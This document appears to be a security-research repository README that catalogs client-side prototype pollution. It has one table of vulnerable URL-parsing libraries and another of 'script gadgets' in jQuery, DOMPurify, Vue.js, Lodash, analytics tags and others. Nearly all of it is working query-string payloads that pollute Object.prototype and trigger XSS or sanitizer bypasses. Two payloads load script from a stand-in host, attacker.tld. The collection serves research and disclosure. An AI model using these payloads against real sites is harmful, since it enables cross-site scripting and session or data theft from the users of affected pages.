Intro
If you are unfamiliar with Prototype Pollution Attack, you should read the following first:
JavaScript prototype pollution attack in NodeJS by Olivier Arteau
Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski
In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact.
Prototype Pollution
| Name | Payload | Refs | Found by |
|---|---|---|---|
| Wistia Embedded Video (Fixed) | ?__proto__[test]=test?__proto__.test=test |
[1] | William Bowling |
| jQuery query-object plugin | ?__proto__[test]=test#__proto__[test]=test |
Sergey Bobrov | |
| jQuery Sparkle | ?__proto__.test=test?constructor.prototype.test=test |
Sergey Bobrov | |
| V4Fire Core Library | ?__proto__.test=test?__proto__[test]=test?__proto__[test]={"json":"value"} |
Sergey Bobrov | |
| backbone-query-parameters | ?__proto__.test=test?constructor.prototype.test=test?__proto__.array=1|2|3 |
[1] | Sergey Bobrov |
| jQuery BBQ | ?__proto__[test]=test?constructor[prototype][test]=test |
Sergey Bobrov | |
| jquery-deparam | ?__proto__[test]=test?constructor[prototype][test]=test |
Sergey Bobrov | |
| MooTools More | ?__proto__[test]=test?constructor[prototype][test]=test |
Sergey Bobrov | |
| Swiftype Site Search (Fixed) | #__proto__[test]=test |
s1r1us | |
| CanJS deparam | ?__proto__[test]=test?constructor[prototype][test]=test |
Rahul Maini | |
| Purl (jQuery-URL-Parser) | ?__proto__[test]=test?constructor[prototype][test]=test#__proto__[test]=test |
Sergey Bobrov | |
| HubSpot Tracking Code (Fixed) | ?__proto__[test]=test?constructor[prototype][test]=test#__proto__[test]=test |
Sergey Bobrov | |
| YUI 3 querystring-parse | ?constructor[prototype][test]=test |
Sergey Bobrov |
Script Gadgets
| Name | Payload | Impact | Refs | Found by |
|---|---|---|---|---|
| Wistia Embedded Video | ?__proto__[innerHTML]=<img/src/onerror=alert(1)> |
XSS | [1] | William Bowling |
| jQuery $.get | ?__proto__[context]=<img/src/onerror%3dalert(1)>&__proto__[jquery]=x |
XSS | Sergey Bobrov | |
| jQuery $.get >= 3.0.0 | ?__proto__[url][]=data:,alert(1)//&__proto__[dataType]=script |
XSS | Michał Bentkowski | |
| jQuery $.get >= 3.0.0 | ?__proto__[url]=data:,alert(1)//&__proto__[dataType]=script&__proto__[crossDomain]= |
XSS | Sergey Bobrov | |
| jQuery $.getScript >= 3.4.0 | ?__proto__[src][]=data:,alert(1)// |
XSS | s1r1us | |
| jQuery $.getScript 3.0.0 - 3.3.1 | ?__proto__[url]=data:,alert(1)// |
XSS | s1r1us | |
| jQuery $(html) | ?__proto__[div][0]=1&__proto__[div][1]=<img/src/onerror%3dalert(1)>&__proto__[div][2]=1 |
XSS | Sergey Bobrov | |
| jQuery $(x).off | ?__proto__[preventDefault]=x&__proto__[handleObj]=x&__proto__[delegateTarget]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
| Google reCAPTCHA | ?__proto__[srcdoc][]=<script>alert(1)</script> |
XSS | s1r1us | |
| Twitter Universal Website Tag | ?__proto__[hif][]=javascript:alert(1) |
XSS | Sergey Bobrov | |
| Tealium Universal Tag | ?__proto__[attrs][src]=1&__proto__[src]=//attacker.tld/js.js |
XSS | Sergey Bobrov | |
| Akamai Boomerang | ?__proto__[BOOMR]=1&__proto__[url]=//attacker.tld/js.js |
XSS | s1r1us | |
| Lodash <= 4.17.15 | ?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1) |
XSS | [1] | Alex Brasetvik |
| sanitize-html | ?__proto__[*][]=onload |
Bypass | [1] | Michał Bentkowski |
| sanitize-html | ?__proto__[innerText]=<script>alert(1)</script> |
Bypass | [1] | Hpdoger |
| js-xss | ?__proto__[whiteList][img][0]=onerror&__proto__[whiteList][img][1]=src |
Bypass | [1] | Michał Bentkowski |
| DOMPurify <= 2.0.12 | ?__proto__[ALLOWED_ATTR][0]=onerror&__proto__[ALLOWED_ATTR][1]=src |
Bypass | [1] | Michał Bentkowski |
| DOMPurify <= 2.0.12 | ?__proto__[documentMode]=9 |
Bypass | [1] | Michał Bentkowski |
| Closure | ?__proto__[*%20ONERROR]=1&__proto__[*%20SRC]=1 |
Bypass | [1] | Michał Bentkowski |
| Closure | ?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)// |
XSS | [1] | Michał Bentkowski |
| Marionette.js / Backbone.js | ?__proto__[tagName]=img&__proto__[src][]=x:&__proto__[onerror][]=alert(1) |
XSS | Sergey Bobrov | |
| Adobe Dynamic Tag Management | ?__proto__[src]=data:,alert(1)// |
XSS | Sergey Bobrov | |
| Swiftype Site Search | ?__proto__[xxx]=alert(1) |
XSS | s1r1us | |
| Embedly Cards | ?__proto__[onload]=alert(1) |
XSS | Guilherme Keerok | |
| Segment Analytics.js | ?__proto__[script][0]=1&__proto__[script][1]=<img/src/onerror%3dalert(1)>&__proto__[script][2]=1 |
XSS | Sergey Bobrov | |
| Knockout.js | ?__proto__[4]=a':1,[alert(1)]:1,'b&__proto__[5]=, |
XSS | Michał Bentkowski | |
| Zepto.js | ?__proto__[onerror]=alert(1) |
XSS | [1] | lih3iu |
| Sprint.js | ?__proto__[div][intro]=<img%20src%20onerror%3dalert(1)> |
XSS | [1] | lih3iu |
| Vue.js | ?__proto__[v-if]=_c.constructor('alert(1)')() |
XSS | POSIX | |
| Vue.js | ?__proto__[attrs][0][name]=src&__proto__[attrs][0][value]=xxx&__proto__[xxx]=data:,alert(1)//&__proto__[is]=script |
XSS | [1] | s1r1us |
| Vue.js | ?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')() |
XSS | [1] | r00timentary |
| Vue.js | ?__proto__[data]=a&__proto__[template][nodeType]=a&__proto__[template][innerHTML]=<script>alert(1)</script> |
XSS | [1] | SuperGuesser |
| Vue.js | ?__proto__[props][][value]=a&__proto__[name]=":''.constructor.constructor('alert(1)')()," |
XSS | [1] | st98_ |
| Vue.js | ?__proto__[template]=<script>alert(1)</script> |
XSS | [1] | huli |